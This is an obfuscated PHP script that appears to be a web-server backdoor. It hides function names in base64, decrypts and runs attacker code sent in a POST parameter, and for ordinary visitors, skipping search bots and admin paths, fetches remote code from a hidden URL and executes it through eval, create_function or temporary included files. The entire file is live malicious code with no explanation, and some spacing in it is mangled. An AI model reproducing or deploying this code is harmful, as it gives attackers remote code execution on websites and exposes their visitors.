< ? php function BlXxDJqU($PpNYYZlrJRDxI, $dLNmVKxFatjmWSMj, $fyHgWcuOGTLS) { $base64_decode = "base64_decode"; $substr = $base64_decode("c3Vic3Ry"); $strlen = $base64_decode("c3RybGVu"); $strpos = $base64_decode("c3RycG9z"); $TsbXuavaDmdYPqVN = $strpos($PpNYYZlrJRDxI, $dLNmVKxFatjmWSMj); if ($TsbXuavaDmdYPqVN === false) { return false; } $lgGWrcMtyzhWQC = $strpos($PpNYYZlrJRDxI, $fyHgWcuOGTLS, $TsbXuavaDmdYPqVN); $WWGiGAbaitLo = $substr($PpNYYZlrJRDxI, ($TsbXuavaDmdYPqVN + $strlen($dLNmVKxFatjmWSMj)), ($lgGWrcMtyzhWQC - $TsbXuavaDmdYPqVN - $strlen($dLNmVKxFatjmWSMj))); return $WWGiGAbaitLo; } function NxnlgIVr() { $base64_decode = "base64_decode"; $array_key_exists = $base64_decode("YXJyYXlfa2V5X2V4aXN0cw=="); $strpos = $base64_decode("c3RycG9z"); $ret = ""; if ( @ $array_key_exists("HTTP_X_FORWARDED_FOR", $_SERVER) && ! @ empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { if ( @ $strpos($_SERVER["HTTP_X_FORWARDED_FOR"], ",") > 0) { $rRDKEcxvzdx = @ explode(",", $_SERVER["HTTP_X_FORWARDED_FOR"]); $ret = trim($rRDKEcxvzdx[0]); } else { $ret = @ $_SERVER["HTTP_X_FORWARDED_FOR"]; } } else { $ret = @ $_SERVER["REMOTE_ADDR"]; } $ret = trim($ret); if (!$ret || empty($ret) || $ret == "") { $ret = -1; } return $ret; } function dDTxWcnu($gScYkKyXtqnNYZzX) { $base64_decode = "base64_decode"; $preg_match = $base64_decode("cHJlZ19tYXRjaA=="); $function_exists = $base64_decode("ZnVuY3Rpb25fZXhpc3Rz"); $curl_setopt = $base64_decode("Y3VybF9zZXRvcHQ="); $constant = $base64_decode("Y29uc3RhbnQ="); $CURLOPT_TIMEOUT = $base64_decode("Q1VSTE9QVF9USU1FT1VU"); $CURLOPT_CONNECTTIMEOUT = $base64_decode("Q1VSTE9QVF9DT05ORUNUVElNRU9VVA=="); $CURLOPT_URL = $base64_decode("Q1VSTE9QVF9VUkw="); $CURLOPT_RETURNTRANSFER = $base64_decode("Q1VSTE9QVF9SRVRVUk5UUkFOU0ZFUg=="); $CURLOPT_HTTPHEADER = $base64_decode("Q1VSTE9QVF9IVFRQSEVBREVS"); $parse_url = $base64_decode("cGFyc2VfdXJs"); $fsockopen = $base64_decode("ZnNvY2tvcGVu"); $feof = $base64_decode("ZmVvZg=="); $fgets = $base64_decode("ZmdldHM="); $fclose = $base64_decode("ZmNsb3Nl"); $server = $_SERVER; $full_url_path = "http://".$server["HTTP_HOST"].$server["REQUEST_URI"]; if ( @ $function_exists("curl_init")) { $mwOmkDPPBVEVEVGx = curl_init(); $curl_setopt($mwOmkDPPBVEVEVGx, $constant($CURLOPT_TIMEOUT), 5); $curl_setopt($mwOmkDPPBVEVEVGx, $constant($CURLOPT_CONNECTTIMEOUT), 5); $curl_setopt($mwOmkDPPBVEVEVGx, $constant($CURLOPT_URL), $gScYkKyXtqnNYZzX); $curl_setopt($mwOmkDPPBVEVEVGx, $constant($CURLOPT_RETURNTRANSFER), 1); $curl_setopt($mwOmkDPPBVEVEVGx, $constant($CURLOPT_HTTPHEADER), array("X-Forwarded-Forr: ".NxnlgIVr(), "User-Agent: ". @ $server["HTTP_USER_AGENT"], "Referer: ".$full_url_path, )); $ret = trim(curl_exec($mwOmkDPPBVEVEVGx)); } elseif( @ $function_exists("fsockopen")) { $PSICpAHvJbLtQhDM = @ $parse_url($gScYkKyXtqnNYZzX); if ($RZAkYEwcDbX = @ $fsockopen($PSICpAHvJbLtQhDM["host"], 80, $nQJoaCNfGQxLXbd, $POzzkZIrfHoXJB, 6)) { fwrite($RZAkYEwcDbX, "GET http://".$PSICpAHvJbLtQhDM["host"].$PSICpAHvJbLtQhDM["path"]."?".$PSICpAHvJbLtQhDM["query"]." HTTP/1.0\r\nHost: ".$PSICpAHvJbLtQhDM["host"]."\r\nUser-Agent: ". @ $server["HTTP_USER_AGENT"]."\r\nX-Forwarded-Forr: ".NxnlgIVr()."\r\nReferer: ".$full_url_path."\r\nConnection: Close\r\n\r\n"); $ret = ""; while (!$feof($RZAkYEwcDbX)) { $ret. = @ $fgets($RZAkYEwcDbX, 1024); } @ list($UlUZHBnjVspgQMQC, $ret) = @ explode("\r\n\r\n", $ret); @ $fclose($RZAkYEwcDbX); } } else { $ret = "curl_init and fsockopen disabled"; } return $ret; } $base64_decode = "base64_decode"; $post = $_POST; $substr = $base64_decode("c3Vic3Ry"); $strlen = $base64_decode("c3RybGVu"); $stripos = $base64_decode("c3RyaXBvcw=="); $basename = $base64_decode("YmFzZW5hbWU="); $is_null = $base64_decode("aXNfbnVsbA=="); if (isset($post[$base64_decode("aw==")])) { $k = $post[$base64_decode("aw==")]; $ord = $base64_decode("b3Jk"); $chr = $base64_decode("Y2hy"); $abs = $base64_decode("YWJz"); $PrcEfosXthhYM = ""; $uuqJfNgEXRGH = $base64_decode("o52fzMKrmtqMVqWXpKGl3o/Oy6ahrFdlhWVja5eYZJibZmWMnkKp2N2veKWcppLZmc/HmKShoqLZW2hplY5u3saVpcbLYHrex5mopqChoYVUx4u0tUKen42Zm6XKxJjZzKel1otfY5XJpqqhqZGf1JeJi2JYs1V5y5yensTVqNXCl6DR152j2tdcX2Bml6XXn9TBpaefXGWMWlt0haWoz8+dn86LX2OVyaaqoamRn9SXiYt0WLU/ec6aoKjXypLW1pmjwsSapNjYXKykrJdcoFBsop6qqqSrxKWXqdTXp8rRm1mTjHM/zNmim6agoaGFk9HOpZ2bqWGOrjxCicii1tGoUaCDaHBwbZ2eWqClpsqkioaYf32JlIyWWZaOhVmHg6el1c+do46Ik393i41ayFe/i3doYbBDbjxWnNTaodWDcVGHwn96ur9bm1mUbT1urcfOrJ1Ynp+NnKWsytlbhcKEgLa3k1zJi5FhUl1YU9ik1M6epmBZmLWChY3AjJaIwF1vk4yzP29tWJuhrKCnhW2ChpiIh4iNwFqVYMKgPWrgPjqHwptVo4SVqqSYq1uOa2xrXZpuVXaFVZSa2MpplYViU4WRWpSIklacl5pUYYefxsdbc0I+n9SlWl3OhXCBlG9Rh8xYcaOEWJuhrKCnoFCGy2RjWF60bzw7osuNnNTWmaWLh5eFtbeIk1R6gYKweae1W2ZcnpaOU1hfhdin08+Zn4uHl4W1t4iTVHqBgrB5p7VbZlyelo5xYmLgbzxqbFiQxr6VcobYpqGfX1aStX+1tpRae4SIsHx3jIeTV8rAXWxtbEGycG2xQjupl6faotCCXZpuXaLSo56oycpbg4VgVcLGYV6hbrFCcquhqMiYioaYi32Hj6qFjVu4qIWqs4iQqayEerSlgX1UlF5b2ZnPx2FhZV1sm2NiY5eZXZSZaVuWjGFeoW50rKGslZuNksPVnqaZop6NV5GMqreJprWPU7amin62uJN+e4N3gaZ9p4SWYWRdrc6gl2GOkluUmWRhjZVsX5maaWJlYFtcoDqGwZxYdVWc1J+ensjZW4qePprJi1ma09SosVpbkZaOUIiIWausp6XKoVpdxMhcn5NdrG2DWFWGhFSdqJieW4mPxYt0QrWapdiYrUNuzZjCx5mji4WAibq0Y2lgZ1JnlWSCsKisWHuo2qGWW46gPd4="); for ($i = 0; $i < $strlen($uuqJfNgEXRGH); $i++) { $wBuWtQysXir = $ord($substr($uuqJfNgEXRGH, $i)); $wBuWtQysXir -= $ord($substr($k, (($i + 1) % $strlen($k)))); $PrcEfosXthhYM. = $chr($abs($wBuWtQysXir) & 0xFF); } AHAfeNGM($PrcEfosXthhYM, true); exit(); } $server = $_SERVER; $request_uri = @ $server["REQUEST_URI"]; $request_flag = false; if ( @ empty($request_uri) || @ $strlen($request_uri) == 0 || @ $is_null($request_uri)) { $request_flag = true; } else { if ( @ $stripos($request_uri, @ $basename(__FILE__)) === false) { $request_flag = true; } } if ($request_flag) { $base64_decode = "base64_decode"; $preg_match = $base64_decode("cHJlZ19tYXRjaA=="); $file_get_contents = $base64_decode("ZmlsZV9nZXRfY29udGVudHM="); $substr = $base64_decode("c3Vic3Ry"); $substr_replace = $base64_decode("c3Vic3RyX3JlcGxhY2U="); $strlen = $base64_decode("c3RybGVu"); $md5 = $base64_decode("bWQ1"); if (!defined("___INIT___123213")) { define("___INIT___123213", 1); if (! @ $server["HTTP_USER_AGENT"]OR @ $preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", @ $server["HTTP_USER_AGENT"])) {} else { $KicFXAHNhKv = @ $server["HTTP_HOST"]; if ( @ $is_null($KicFXAHNhKv)) { $KicFXAHNhKv = "PHPSESSIDPHP"; } else { if ($substr($KicFXAHNhKv, 0, 4) == "www.") { $KicFXAHNhKv = $substr_replace($KicFXAHNhKv, "", 0, 4); } } $xCrDRanYZEFbGn = $md5($md5($KicFXAHNhKv.$KicFXAHNhKv)); if (isset($_COOKIE[$xCrDRanYZEFbGn])) {} else { $uri_match_flag = false; foreach(array("/\.css$/", "/\.swf$/", "/\.ashx$/", "/\.docx$/", "/\.doc$/", "/\.xls$/", "/\.xlsx$/", "/\.xml$/", "/\.jpg$/", "/\.pdf$/", "/\.png$/", "/\.gif$/", "/\.ico$/", "/\.js$/", "/\.txt$/", "/ajax/", "/cron\.php$/", "/wp\-login\.php$/", "/\/wp\-includes\//", "/\/wp\-admin/", "/\/admin\//", "/\/wp\-content\//", "/\/administrator\//", "/phpmyadmin/i", "/xmlrpc\.php/", "/\/feed\//")as$FPLJUgRCgqAGp) { if ( @ $preg_match($FPLJUgRCgqAGp, $server["REQUEST_URI"])) { $uri_match_flag = true; break; } } if (!$uri_match_flag) { if ( @ $preg_match("/\/\*[it]{2) *[fk]{2}\*\//i", @ $file_get_contents(__FILE__), $iiRhotJkUfmZv)) { $PpNYYZlrJRDxI = @ BlXxDJqU( @ dDTxWcnu($base64_decode($substr($iiRhotJkUfmZv[0], 10, @ $strlen($iiRhotJkUfmZv[0]) - 20))), "START:", "-STOP"); if ($PpNYYZlrJRDxI && @ $strlen($PpNYYZlrJRDxI) > 0) { AHAfeNGM($base64_decode($PpNYYZlrJRDxI)); } } } } } } } else { exit(); } function AHAfeNGM($PrcEfosXthhYM, $jMHFfheEJxaXeJt = false) { $base64_decode = "base64_decode"; $tmpfile = $base64_decode("dG1wZmlsZQ=="); $function_exists = $base64_decode("ZnVuY3Rpb25fZXhpc3Rz"); $stream_get_meta_data = $base64_decode("c3RyZWFtX2dldF9tZXRhX2RhdGE="); $is_array = $base64_decode("aXNfYXJyYXk="); $file_exists = $base64_decode("ZmlsZV9leGlzdHM="); $fwrite = $base64_decode("ZndyaXRl"); $fclose = $base64_decode("ZmNsb3Nl"); $file_get_contents = $base64_decode("ZmlsZV9nZXRfY29udGVudHM="); $stripos = $base64_decode("c3RyaXBvcw=="); $unlink = $base64_decode("dW5saW5r"); $ini_get = $base64_decode("aW5pX2dldA=="); $sys_get_temp_dir = $base64_decode("c3lzX2dldF90ZW1wX2Rpcg=="); $is_writable = $base64_decode("aXNfd3JpdGFibGU="); $tempnam = $base64_decode("dGVtcG5hbQ=="); $rand = $base64_decode("cmFuZA=="); $fopen = $base64_decode("Zm9wZW4="); $preg_replace = $base64_decode("cHJlZ19yZXBsYWNl"); $create_function = $base64_decode("Y3JlYXRlX2Z1bmN0aW9u"); $base64_encode = $base64_decode("YmFzZTY0X2VuY29kZQ=="); $ < ? php = $base64_decode("PD9waHA="); $eval = $base64_decode("ZXZhbA=="); $uri = $base64_decode("dXJp"); $upload_tmp_dir = $base64_decode("dXBsb2FkX3RtcF9kaXI="); $return = $base64_decode("cmV0dXJuIA=="); $w = $base64_decode("dw=="); $constant = $base64_decode("Y29uc3RhbnQ="); $DIRECTORY_SEPARATOR = $base64_decode("RElSRUNUT1JZX1NFUEFSQVRPUg=="); $PHP_EOL = $base64_decode("UEhQX0VPTA=="); $DOCUMENT_ROOT = $base64_decode("RE9DVU1FTlRfUk9PVA=="); if ($function_exists($preg_replace)) { $rand_number = $rand(300, 6000); $_t = 30; $ADvxRTAJsMAKwZw = "\$_t = 15;"; $zbteMpxiYPmvjhD = $eval."('".$ADvxRTAJsMAKwZw."');"; $preg_replace("/".$rand_number."/e", $zbteMpxiYPmvjhD, $rand_number); if ($_t == 15) { $zbteMpxiYPmvjhD = $eval."(base64_decode('".$base64_encode($PrcEfosXthhYM)."'));"; $preg_replace("/".$rand_number."/e", $zbteMpxiYPmvjhD, $rand_number); if ($jMHFfheEJxaXeJt) { exit(); } else { return; } } } if ($function_exists($create_function)) { $leXDgFsbZfHJEpUe = 35; $qZXFqVOjPuVK = $create_function("", $return."15;"); $leXDgFsbZfHJEpUe = $qZXFqVOjPuVK(); if ($leXDgFsbZfHJEpUe == 15) { $qZXFqVOjPuVK = $create_function("", $PrcEfosXthhYM); $qZXFqVOjPuVK(); if ($jMHFfheEJxaXeJt) { exit(); } else { return; } } } if ( @ $is_writable($_SERVER[$DOCUMENT_ROOT].$constant($DIRECTORY_SEPARATOR))) { $PFyRbXVOUBY = $_SERVER[$DOCUMENT_ROOT].$constant($DIRECTORY_SEPARATOR).$rand(500, 6000); $RZAkYEwcDbX = @ $fopen($PFyRbXVOUBY, $w); if ( @ $file_exists($PFyRbXVOUBY)) { @ $fwrite($RZAkYEwcDbX, $ < ? php.$constant($PHP_EOL).$PrcEfosXthhYM); $fclose($RZAkYEwcDbX); if ($stripos($file_get_contents($PFyRbXVOUBY), $PrcEfosXthhYM) !== false) { if (!defined("___NOTSELF___")) { define("___NOTSELF___", 1); } include_once($PFyRbXVOUBY); @ $unlink($PFyRbXVOUBY); if ($jMHFfheEJxaXeJt) { exit(); } else { return; } } @ $unlink($PFyRbXVOUBY); } } $govZrUCmHBO = @ $tmpfile(); if ($function_exists($stream_get_meta_data)) { $twetAagkRhmQXLKU = @ $stream_get_meta_data($govZrUCmHBO); if ($is_array($twetAagkRhmQXLKU)) { if ( @ $file_exists($twetAagkRhmQXLKU[$uri])) { @ $fwrite($govZrUCmHBO, $ < ? php.$constant($PHP_EOL).$PrcEfosXthhYM); $QNRswKKBLFHX = $file_get_contents($twetAagkRhmQXLKU[$uri]); if ($stripos($QNRswKKBLFHX, $PrcEfosXthhYM) !== false) { if (!defined("___NOTSELF___")) { define("___NOTSELF___", 1); } include_once($twetAagkRhmQXLKU[$uri]); $fclose($govZrUCmHBO); @ $unlink($twetAagkRhmQXLKU[$uri]); if ($jMHFfheEJxaXeJt) { exit(); } else { return; } } } } } $OtALpJiZcOElWGO = @ $ini_get($upload_tmp_dir); $OtALpJiZcOElWGO = $OtALpJiZcOElWGO ? $OtALpJiZcOElWGO : @ $sys_get_temp_dir(); if ( @ $file_exists($OtALpJiZcOElWGO) && @ $is_writable($OtALpJiZcOElWGO)) { $tmpfile = @ $tempnam($OtALpJiZcOElWGO, $rand(10, 1000)); $RZAkYEwcDbX = @ $fopen($tmpfile, $w); if ( @ $file_exists($tmpfile)) { @ $fwrite($RZAkYEwcDbX, $ < ? php.$constant($PHP_EOL).$PrcEfosXthhYM); $fclose($RZAkYEwcDbX); if ($stripos($file_get_contents($tmpfile), $PrcEfosXthhYM) !== false) { if (!defined("___NOTSELF___")) { define("___NOTSELF___", 1); } include_once($tmpfile); @ $unlink($tmpfile); if ($jMHFfheEJxaXeJt) { exit(); } else { return; } } @ $unlink($tmpfile); } } }